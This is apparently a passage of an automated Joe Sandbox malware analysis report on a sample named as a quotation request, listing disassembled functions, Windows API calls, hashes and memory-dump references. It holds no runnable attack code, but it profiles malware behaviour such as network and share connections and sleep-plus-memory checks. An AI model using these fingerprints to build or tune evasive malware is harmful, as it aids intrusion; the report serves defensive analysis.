                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2889604237-0
                                                                                                                    • Opcode ID: a38fb8ca51e75167f1ae84f1cd9d3622af0a10b78000eef3e029cc24e3899f15
                                                                                                                    • Instruction ID: de097d6f6a473eeb2f4ef351a53ad16ff9da480fb6dcf43b3cc8c5748a70ce3b
                                                                                                                    • Opcode Fuzzy Hash: a38fb8ca51e75167f1ae84f1cd9d3622af0a10b78000eef3e029cc24e3899f15
                                                                                                                    • Instruction Fuzzy Hash: 4BE09AB5940209DFCB41DFA0D90C66DBBB5FB09311F148459E84AE7350CB389941BF90
                                                                                                                    Function 00F6D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDesktopWindow.USER32 ref: 00F6D86C
                                                                                                                    • GetDC.USER32(00000000), ref: 00F6D876
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F6D882
                                                                                                                    • ReleaseDC.USER32(?), ref: 00F6D8A3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2889604237-0
                                                                                                                    • Opcode ID: 94ffb31e5f21f7b09dc2ea295972a20b68590d7dee9d9cbf4cf14313b6c25e32
                                                                                                                    • Instruction ID: d2ccbaca1cf1d56ae8c0eddaf3b6aba213625b809ca9ba951a5bdeb6b6ab1e6c
                                                                                                                    • Opcode Fuzzy Hash: 94ffb31e5f21f7b09dc2ea295972a20b68590d7dee9d9cbf4cf14313b6c25e32
                                                                                                                    • Instruction Fuzzy Hash: A2E092B5800208EFCB51EFA0D80866EBBB5BB09311B148449E94AE7360CB389942BF90
                                                                                                                    Function 00F84D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F17620: _wcslen.LIBCMT ref: 00F17625
                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00F84ED4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Connection_wcslen
                                                                                                                    • String ID: *$LPT
                                                                                                                    • API String ID: 1725874428-3443410124
                                                                                                                    • Opcode ID: 8dfeebc2741f5ee0c1b00bf9dde06d6d68817408a07342c77df8e6d570b3f915
                                                                                                                    • Instruction ID: f47f3a68d9d9d989052617d25fc56ecc0d6dcf3c39b4bf5a978353654de2c641
                                                                                                                    • Opcode Fuzzy Hash: 8dfeebc2741f5ee0c1b00bf9dde06d6d68817408a07342c77df8e6d570b3f915
                                                                                                                    • Instruction Fuzzy Hash: 48913C75A002059FCB14EF58C884EEABBF1AF44314F19809DE90A9F3A2D735ED85DB91
                                                                                                                    Function 00F3E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00F3E30D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                    • String ID: pow
                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                    • Opcode ID: 30aad09ac9ec555d3b904b5bb49d5bf2579d60cfde808957fef80490eee62894
                                                                                                                    • Instruction ID: d204426f008871a343637c4f1cf81205bd5401bfd04b9d2d9cf75c30eb5e1faf
                                                                                                                    • Opcode Fuzzy Hash: 30aad09ac9ec555d3b904b5bb49d5bf2579d60cfde808957fef80490eee62894
                                                                                                                    • Instruction Fuzzy Hash: 33516B61E1C30696CB157724CD413BA3FA4EF40770F348E68E8D5823E9EB348C95BA86
                                                                                                                    Function 00F2E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: #
                                                                                                                    • API String ID: 0-1885708031
                                                                                                                    • Opcode ID: 29ab4170986eef7dc230b4d855552ef02adae3a631658b1ccca33df3441786ff
                                                                                                                    • Instruction ID: 0dddadd7a2dcfc6b4acc5074d3fb30c7a09783cf88203b707b243d474ae2aa19
                                                                                                                    • Opcode Fuzzy Hash: 29ab4170986eef7dc230b4d855552ef02adae3a631658b1ccca33df3441786ff
                                                                                                                    • Instruction Fuzzy Hash: 6F51367AD04256DFDF15DF28D4416FA7BA8EF55320F344055ECA29B2C0D6349D42EBA0
                                                                                                                    Function 00F2F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00F2F2A2
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F2F2BB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                    • Opcode ID: 5bff894f9d9264a75b7a5797fd2bbb54449dc2f046434c77990bbd41b1c45e15
                                                                                                                    • Instruction ID: ea68aaff0db99a935bf3974eda544f1240d8066d19a5b7f901e44f4d86b321ac
                                                                                                                    • Opcode Fuzzy Hash: 5bff894f9d9264a75b7a5797fd2bbb54449dc2f046434c77990bbd41b1c45e15
                                                                                                                    • Instruction Fuzzy Hash: 825136714087489BD320AF10DC86BAFBBF8FF85300F81885DF1D9421A5EB749569DBA6
                                                                                                                    Function 00F95745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00F957E0
                                                                                                                    • _wcslen.LIBCMT ref: 00F957EC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                                                    • String ID: CALLARGARRAY
                                                                                                                    • API String ID: 157775604-1150593374
                                                                                                                    • Opcode ID: 8ca00625ab12a784b2b104d4806dc4ddd9287c58281552d7fda9bccf4538bb13
                                                                                                                    • Instruction ID: d90f5c211101becc13aaaed3e03eb7eac513cd203642ff0f26c9e915d93d1214
                                                                                                                    • Opcode Fuzzy Hash: 8ca00625ab12a784b2b104d4806dc4ddd9287c58281552d7fda9bccf4538bb13
                                                                                                                    • Instruction Fuzzy Hash: E241BE71E002099FDF14EFA9C8859EEBBB5EF59720F108029E505A7252EB349D81EB90
                                                                                                                    Function 00F8D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00F8D130
                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F8D13A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CrackInternet_wcslen
                                                                                                                    • String ID: |
                                                                                                                    • API String ID: 596671847-2343686810
                                                                                                                    • Opcode ID: 272aafe7dcd88f224397746fbd9dea9c059b53046331ddcad1d58af4b5225737
                                                                                                                    • Instruction ID: f22ad338668a4be6e47b5eb5ac532db52cb451f8835c22bb0da49d82d96289de
                                                                                                                    • Opcode Fuzzy Hash: 272aafe7dcd88f224397746fbd9dea9c059b53046331ddcad1d58af4b5225737
                                                                                                                    • Instruction Fuzzy Hash: 40317E71D00209ABDF11EFA5CC85EEEBFB9FF04310F000019F815A6162EB35AA46EB64
                                                                                                                    Function 00FA356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00FA3621
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00FA365C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                    • Opcode ID: 06ea941c66746dd0ceff467c36898513c0e47c5fcfa98496b01d57c906c61772
                                                                                                                    • Instruction ID: df153e2bde81b209198f522c969d53ac2ebb6ab88e8b75bd09350e638251d86d
                                                                                                                    • Opcode Fuzzy Hash: 06ea941c66746dd0ceff467c36898513c0e47c5fcfa98496b01d57c906c61772
                                                                                                                    • Instruction Fuzzy Hash: 4D3190B1510204AEDB10DF68DC80EFB73A9FF89760F008619F8A5D7280DA35ED81E760
                                                                                                                    Function 00FA4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00FA461F
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FA4634
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: '
                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                    • Opcode ID: 0983fdb7967083f95a51f34822a9ee118a85566ee831861dcea77658c5f9c5e9
                                                                                                                    • Instruction ID: b2b096533fdea223bae625790c98ad79232e3a8d7d78fdc1cd4b2bb3a12c52c8
                                                                                                                    • Opcode Fuzzy Hash: 0983fdb7967083f95a51f34822a9ee118a85566ee831861dcea77658c5f9c5e9
                                                                                                                    • Instruction Fuzzy Hash: FC3119B5E012099FDB14CF69C990BDABBB5FF8A310F14406AE905AB391D7B0A941DF90
                                                                                                                    Function 00FA31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FA327C
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FA3287
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: Combobox
                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                    • Opcode ID: 58c366c2eed0ede17797aad954d806d15a502b76dcc77fddd6591e8ec87c8877
                                                                                                                    • Instruction ID: 0cc821732c9b568eacb099c817c537ade49bc9312f2241a71d9eb91187963068
                                                                                                                    • Opcode Fuzzy Hash: 58c366c2eed0ede17797aad954d806d15a502b76dcc77fddd6591e8ec87c8877
                                                                                                                    • Instruction Fuzzy Hash: D311B6B17002087FEF219E54DC81FBB379AEB563A4F104125F91897290D6719D51A7A0
                                                                                                                    Function 00FA3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F1600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F1604C
                                                                                                                      • Part of subcall function 00F1600E: GetStockObject.GDI32(00000011), ref: 00F16060
                                                                                                                      • Part of subcall function 00F1600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F1606A
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FA377A
                                                                                                                    • GetSysColor.USER32(00000012), ref: 00FA3794
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                    • Opcode ID: 63ea269c6c9ba3cae0011cca47d1018268a4832255a5ff59913456a8c74920ac
                                                                                                                    • Instruction ID: 602068964395133cc99019e27ef04f8c88b53952905b971907f8da78db813575
                                                                                                                    • Opcode Fuzzy Hash: 63ea269c6c9ba3cae0011cca47d1018268a4832255a5ff59913456a8c74920ac
                                                                                                                    • Instruction Fuzzy Hash: D91129B2610209AFDB00DFA8CC45EFA7BB8FB09354F004514F955E2250E775E951ABA0
                                                                                                                    Function 00F8CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F8CD7D
                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F8CDA6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                    • String ID: <local>
                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                    • Opcode ID: aebd8f46414c1061f6efba7602c175b2bcec1628cceff57983f305b662d17b68
                                                                                                                    • Instruction ID: 105612300cbf0ca2a0aae5619b7168edab3da0ac048be1963868f4a27234a02b
                                                                                                                    • Opcode Fuzzy Hash: aebd8f46414c1061f6efba7602c175b2bcec1628cceff57983f305b662d17b68
                                                                                                                    • Instruction Fuzzy Hash: EB11A3776056367AD7246B668C45FE7BEA9EB127B4F004226B52983180D6709841E7F0
                                                                                                                    Function 00FA3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00FA34AB
                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00FA34BA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                    • String ID: edit
                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                    • Opcode ID: 2ce3126190d2573f042bb3b0a04a0706a4c8fb129e476eb893f04c6a6b1b9022
                                                                                                                    • Instruction ID: 52d891637dda853817384584829ddc2f05e6ebb1cafcad89b9c54cf3fb58fa8a
                                                                                                                    • Opcode Fuzzy Hash: 2ce3126190d2573f042bb3b0a04a0706a4c8fb129e476eb893f04c6a6b1b9022
                                                                                                                    • Instruction Fuzzy Hash: 2B118FB1900208AFEB118E64DC44AEB3B6AEB0A374F504324FD65971D4C775DD91BB90
                                                                                                                    Function 00F76C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 00F76CB6
                                                                                                                    • _wcslen.LIBCMT ref: 00F76CC2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                    • String ID: STOP
                                                                                                                    • API String ID: 1256254125-2411985666
                                                                                                                    • Opcode ID: cea267a4f46c6a1d9b715cba5ef1e614deed79e030c2d19e075665fcd59abc4c
                                                                                                                    • Instruction ID: 6d5f7290b4885c76b96661a4161649816107b9c2149a7ae8bd8199765830b77c
                                                                                                                    • Opcode Fuzzy Hash: cea267a4f46c6a1d9b715cba5ef1e614deed79e030c2d19e075665fcd59abc4c
                                                                                                                    • Instruction Fuzzy Hash: 29010433A109278ACB219FBDDC809BF33A5EA61720B104526E856D6190EB35D940E691
                                                                                                                    Function 00F71CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F73CCA
                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F71D4C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
